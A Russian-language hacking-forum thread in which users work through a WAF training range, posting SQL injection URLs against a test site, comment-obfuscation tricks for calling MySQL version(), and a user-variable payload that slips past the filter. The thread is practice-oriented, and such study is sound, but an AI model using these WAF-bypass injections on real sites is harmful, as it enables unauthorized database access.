WAF-тренировка

Discussion in 'Песочница' started by BigBear, 14 Mar 2016.

  1. imildar

    imildar New Member

    Joined:
    4 Mar 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    version() фильтруется WAFом хостинга?
     
  2. cMs

    cMs New Member

    Joined:
    14 Feb 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток.
    Может,кто подскажет как пробросить в первом задание version().
    Синонемы функции блочит.(left,right and etc)
    Различные комбинации с обфусикацие тоже.
    Через Hex лишь в таблицу добавляет заhex-ое слово.
    Ы.З В каком направление капать. Во втором задание все прекрасно проходит.
    Ы.Ы.З Может и туплю, но хотелось бы получить хинт.
     
  3. leksadin

    leksadin Level 8

    Joined:
    19 Jan 2016
    Messages:
    117
    Likes Received:
    47
    Reputations:
    2

    Странно, это блочит WAF хостинга, а не самого задания...
     
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    761
    Likes Received:
    688
    Reputations:
    68
    так и чего waf помучать)?
    раз уж репа все равно не выдаётся за таски

    Code:
    http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27union+select+1,2,3,version/**/()%23
    
     
    _________________________
    BabaDook likes this.
  5. cMs

    cMs New Member

    Joined:
    14 Feb 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    WAF всеравно это фильтрует.Таким образом с самого начала пытался(кроме %23).Что бы прокинуть саму скуль для первого задания пришлось юзать такую конструкцию:
    Code:
    http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27/*union*/union/*select*/select%201,2,3,4%20--%20
    Не знаю, может проблема у меня, но тестовая площадка порой введет себя странно. Запрос вашего ввида у меня вначале не проходил. Я не понимал в чем проблема, но WAF уже тогда блочил union,select и т.п.А через пару дней после уже использования своей конструкции, решил еще разок закинуть простой ввид, который не должен был пахать,он сработал, что удивило меня.

    Ы.З Вопрос все еще открыт.
    Версия так же не заходит.
    Ы.Ы.З В третьем и 4, по сути тоже должен быть один запрос с некоторой поравкой на xss, но сама скуля(без внедреняя еще xss),что пашет на 3, не пашет на 4.
    Ы.Ы.Ы.З полные ответы думаю стоит стереть после ответа на воп, иначе не будет интереса.
    Спасибо за отклик.
     
    #45 cMs, 17 Feb 2017
    Last edited: 18 Feb 2017
  6. SooLFaa

    SooLFaa Reservists Of Antichat

    Joined:
    17 Mar 2014
    Messages:
    455
    Likes Received:
    426
    Reputations:
    132
    Всё равно моё мнение не надо вот так сливать таски. Хинтом помочь, да. А открыто постить решение лишает фана проходящих сие таски.
     
    _________________________
  7. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    761
    Likes Received:
    688
    Reputations:
    68
    ой всё, первый вектор, первого таска

    кому интересно ещё валидные конструкции для селекта версии
    Code:
    select version/*!()*/;
    select version/*!(*//*!)*/;
    select version     ();
    select version     (         );
    select version(/*hm*/);
    
    select version
        -> (
        -> );
    
    select @@version;
    
    select 0+version()+0;
    
    select{MySqL_d_bSeLect/*!version*//*!()*/}/*:D*/;
    
    select version()zzz; /*хмм*/
    
    хехе кстати сейчас waf жестко валит запрос на слове version после словосочетаний union+select, кто раскрутит через union+select )? один рабочий вектор точно есть
     
    _________________________
    #47 t0ma5, 20 Feb 2017
    Last edited: 20 Feb 2017
    BabaDook and crlf like this.
  8. cMs

    cMs New Member

    Joined:
    14 Feb 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Как раз вопрос в этом и был, как прокинуть version() в union+select.
    Само слово подчистую фильтрует, другие функции по типу left(), тоже не проходят(unhex,0x).
    Направление подкиньте.
     
  9. SooLFaa

    SooLFaa Reservists Of Antichat

    Joined:
    17 Mar 2014
    Messages:
    455
    Likes Received:
    426
    Reputations:
    132
    Комментарии.
     
    _________________________
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    761
    Likes Received:
    688
    Reputations:
    68
    юзать переменные :)

    неа, уже не работает так
     
    _________________________
  11. SooLFaa

    SooLFaa Reservists Of Antichat

    Joined:
    17 Mar 2014
    Messages:
    455
    Likes Received:
    426
    Reputations:
    132
    Ооо и правда не работает, сам сервак блочит.
     
    _________________________
  12. cMs

    cMs New Member

    Joined:
    14 Feb 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    @ - блочит
    Или создание переменной можно как-то этако?
     
  13. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    761
    Likes Received:
    688
    Reputations:
    68
    да это был тот вектор.. сегодня утром ещё не блочило, слава админам :D
     
    _________________________
  14. cMs

    cMs New Member

    Joined:
    14 Feb 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Я смотрю тут оперативно чекают форум и правят WAF
     
  15. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    761
    Likes Received:
    688
    Reputations:
    68
    хех ладно пусть чекают, валидный вектор :D
    Code:
    http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27+and+@:=version()union+select@,2,3,""%23
    
     
    _________________________
    cMs and st55 like this.
  16. cMs

    cMs New Member

    Joined:
    14 Feb 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Я думал, как только встречается символ/слово,etc WAF его чекает среди мусора, а вон оно как, просто безымянная переменная+: и он уже съел. И в селекте просто пробел убираем он прилепает, скулька хавает, а WAF не видит. Все больше вникая, в суть данного вида уязвимости, приходишь к выводу,что это защита от протечки с помощью сита.

    За ответ спс. Попробую развить данную мысль.
     
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    761
    Likes Received:
    688
    Reputations:
    68
    ну waf вынужденная мера, а сито ситу рознь)
    просто там регекс видимо такой
    union.*select.*(@|version)
    собственно да пробел перед переменной и селектором не обязателен, хм ищу альтернативу, пофиксят скоро наверно)
     
    _________________________
  18. cMs

    cMs New Member

    Joined:
    14 Feb 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    lol, уже блочит.
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    761
    Likes Received:
    688
    Reputations:
    68
    вот ведь -_-
     
    _________________________
  20. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    150
    Likes Received:
    209
    Reputations:
    42
    Оперативно, однако. Собаку добавили в фильтр.
     
    t0ma5 likes this.